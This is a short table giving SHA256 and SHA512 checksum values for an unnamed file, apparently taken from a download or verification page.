| SHA256 | d1c5aa5092330237c7f636e2b899957f0d1f8e82a87007c54e71d6efd98a4a5c |
| SHA512 | 75104ca8cc835ca89c29690e850e2316d43de25274fcd2db8c3b4af4651ea7f8e43e3b05ed4255e40efbad0f0904045c4bee7630c8d663b0bda998a3ff28c8a7 |